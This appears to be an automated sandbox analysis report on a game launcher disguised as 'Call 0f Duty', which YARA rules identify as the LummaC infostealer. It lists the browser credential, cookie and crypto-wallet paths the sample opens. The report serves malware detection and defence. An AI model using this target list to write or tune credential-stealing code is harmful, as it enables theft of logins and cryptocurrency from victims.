Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
